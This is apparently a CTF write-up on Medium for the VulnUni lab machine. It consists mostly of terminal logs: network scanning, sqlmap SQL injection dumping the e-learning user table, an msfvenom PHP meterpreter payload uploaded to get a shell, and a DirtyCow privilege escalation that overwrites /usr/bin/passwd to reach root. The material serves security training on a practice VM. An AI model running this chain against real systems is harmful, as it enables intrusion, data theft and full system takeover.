VulnUni CTF Write-Up

Overview

Getting Started

root@kali$ arp-scan -I eth1 -l Interface: eth1, type: EN10MB, MAC: 00:50:56:3e:70:2d, IPv4: 192.168.8.131 Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.8.1 00:50:56:c0:00:01 VMware, Inc. 192.168.8.132 00:0c:29:bc:43:d1 VMware, Inc. 192.168.8.254 00:50:56:e7:01:af VMware, Inc. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.7: 256 hosts scanned in 1.991 seconds (128.58 hosts/sec). 3 responded
root@kali$ nmap -sV -A -O 192.168.8.132 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 20:45 EDT Nmap scan report for 192.168.8.132 Host is up (0.00077s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: VulnUni - We train the top Information Security Professionals MAC Address: 00:0C:29:BC:43:D1 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.77 ms 192.168.8.132 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Website Enumeration

root@kali$ dirbuster root@kali$ zaproxy
root@kali$ searchsploit GUnet --------------- -------------- Exploit Title | Path | (/usr/share/exploitdb/) --------------- -------------- GUnet OpenEclass 1.7.3 E-learning platform | exploits/php/webapps/48163.txt GUnet OpenEclass E-learning platform 1.7.3 | exploits/php/webapps/48106.txt --------------- -------------- Shellcodes: No Result root@kali$ searchsploit -m 48163 root@kali$ searchsploit -m 48106

SQL Injection

root@kali$ sqlmap -r eclasstestlogin -level=5 -risk=3 -v
root@kali$ sqlmap -r eclasstestlogin -v -current-db root@kali$ sqlmap -r eclasstestlogin -v -D eclass -dump root@kali$ sqlmap -r eclasstestlogin -v -D eclass -T user -dump
root@kali$ msfvenom -p php/meterpreter/bind_tcp LHOST=192.168.8.130 LPORT=4448 R > bind-meterpreter.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 1338 bytes
root@kali$ zip bind-meterpreter bind-meterpreter.php adding: bind-meterpreter.php (deflated 62%)

Target Infiltration

root@kali$ msfconsole msf5 > use multi/handler msf5 exploit(multi/handler) > set LHOST 192.168.8.130 LHOST => 192.168.8.130 msf5 exploit(multi/handler) > set RHOST 192.168.8.132 RHOST => 192.168.8.132 msf5 exploit(multi/handler) > set LPORT 4448 LPORT => 4448 msf5 exploit(multi/handler) > set payload php/meterpreter/bind_tcp payload => php/meterpreter/bind_tcp
root@kali$ msf5 > msf5 exploit(multi/handler) > run [*] Started bind TCP handler against 192.168.8.132:4448 [*] Sending stage (38288 bytes) to 192.168.8.132 [*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.8.132:4448) at 2020-05-12 00:43:47 -0400
root@kali$ meterpreter > shell Process 2181 created. Channel 1 created. export TERM=xterm export SHELL=bash export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin python -c 'import pty;pty.spawn("/bin/bash")' www-data@vulnuni:/root@kali$
www-data@vulnuni$ ls ls Desktop Downloads Pictures Templates examples.desktop Documents Music Public Videos flag.txt www-data@vulnuni:/home/vulnuniwww-data@vulnuni$ cat flag.txt cat flag.txt 68fc668278d9b0d6c3b9dc100bee181e
root@kali$ root@kali:~/Desktop# gcc -pthread cowroot.c -o cowroot cowroot.c: In function 'procselfmemThread': cowroot.c:98:17: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast [-Wint-conversion] 98 | lseek(f,map,SEEK_SET); | ^~~ | | | void * In file included from cowroot.c:27: /usr/include/unistd.h:334:41: note: expected '__off_t' {aka 'long int'} but argument is of type 'void *' 334 | extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW; | ~~~~~~~~^~~~~~~~ cowroot.c: In function 'main': cowroot.c:135:5: warning: implicit declaration of function 'asprintf'; did you mean 'vsprintf'? [-Wimplicit-function-declaration] 135 | asprintf(&backup, "cp %s /tmp/bak", suid_binary); | ^~~~~~~~ | vsprintf cowroot.c:139:5: warning: implicit declaration of function 'fstat' [-Wimplicit-function-declaration] 139 | fstat(f,&st); | ^~~~~
root@kali$ msf > meterpreter > shell Process 2241 created. Channel 0 created. export TERM=xterm export SHELL=bash export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin python -c 'import pty;pty.spawn("/bin/bash")' www-data@vulnuni:/var/www/vulnuni-eclass/courses/tmpUnzippingroot@kali$ ./cowroot ./cowroot DirtyCow root privilege escalation Backing up /usr/bin/passwd to /tmp/bak Size of binary: 42824 Racing, this may take a while.. /usr/bin/passwd overwritten Popping root shell. Don't forget to restore /tmp/bak thread stopped thread stopped root@vulnuni:/var/www/vulnuni-eclass/courses/tmpUnzipping# cat /root/flag.txt cat /root/flag.txt ff19f8d0692fe20f8af33a3bfa6635dd root@vulnuni:/var/www/vulnuni-eclass/courses/tmpUnzipping# whoami whoami root root@vulnuni:/var/www/vulnuni-eclass/courses/tmpUnzipping# id id uid=0(root) gid=33(www-data) groups=0(root),33(www-data) root@vulnuni:/var/www/vulnuni-eclass/courses/tmpUnzipping#

--

--

🎓 M.A. Candidate @GeorgetownCSS Tech/Security/Eastern Europe | Adversary Simulation and Penetration Testing @Deloitte | 🥍 @PennStateMLax Alum

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tyler Butler

🎓 M.A. Candidate @GeorgetownCSS Tech/Security/Eastern Europe | Adversary Simulation and Penetration Testing @Deloitte | 🥍 @PennStateMLax Alum